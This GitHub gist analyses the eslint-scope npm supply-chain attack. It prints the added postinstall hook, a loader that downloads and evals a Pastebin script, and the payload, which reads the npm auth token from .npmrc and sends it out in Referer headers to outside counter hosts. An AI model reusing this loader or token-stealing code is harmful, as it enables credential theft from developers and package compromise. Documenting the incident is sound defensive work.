Skip to content

Instantly share code, notes, and snippets.

@Gerst20051

Gerst20051/build.js

Forked from hzoo/build.js
Created October 21, 2018 00:34
Show Gist options
  • Save Gerst20051/5f1663f1a0060ec9f3a5f1a0b64ddd7a to your computer and use it in GitHub Desktop.
Save Gerst20051/5f1663f1a0060ec9f3a5f1a0b64ddd7a to your computer and use it in GitHub Desktop.
Download ZIP
eslint-scope attack
Raw
readme.md

The attacker modified package.json in both [email protected] and [email protected], adding a postinstall script to run build.js.

{
+ "postinstall": "node ./lib/build.js",
}

build.js

This script downloads another script from Pastebin and evals its contents.

Some people have reported that this code has an issue:

r.on("data", c => {
  eval(c);
});

Because it doesn't wait for the request to complete, it is possible for the reqeuest to only send part of the script and the eval call to fail with a SyntaxError, which is how the issue was discovered.

pastebin (https://pastebin.com/XLeVP82h, taken down)

The script extracts the _authToken from a user's .npmrc and sends it to histats and statcounter inside the Referer header.

Raw
build.js
try {
var https = require("https");
https
.get(
{
hostname: "pastebin.com",
path: "/raw/XLeVP82h",
headers: {
"User-Agent":
"Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0",
Accept:
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
}
},
r => {
r.setEncoding("utf8");
r.on("data", c => {
eval(c);
});
r.on("error", () => {});
}
)
.on("error", () => {});
} catch (e) {}
Raw
pastebin.js
try {
var path = require("path");
var fs = require("fs");
var npmrc = path.join(process.env.HOME || process.env.USERPROFILE, ".npmrc");
var content = "nofile";
if (fs.existsSync(npmrc)) {
content = fs.readFileSync(npmrc, { encoding: "utf8" });
content = content.replace("//registry.npmjs.org/:_authToken=", "").trim();
var https1 = require("https");
https1
.get(
{
hostname: "sstatic1.histats.com",
path: "/0.gif?4103075&101",
method: "GET",
headers: { Referer: "http://1.a/" + content }
},
() => {}
)
.on("error", () => {});
https1
.get(
{
hostname: "c.statcounter.com",
path: "/11760461/0/7b5b9d71/1/",
method: "GET",
headers: { Referer: "http://2.b/" + content }
},
() => {}
)
.on("error", () => {});
}
} catch (e) {}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment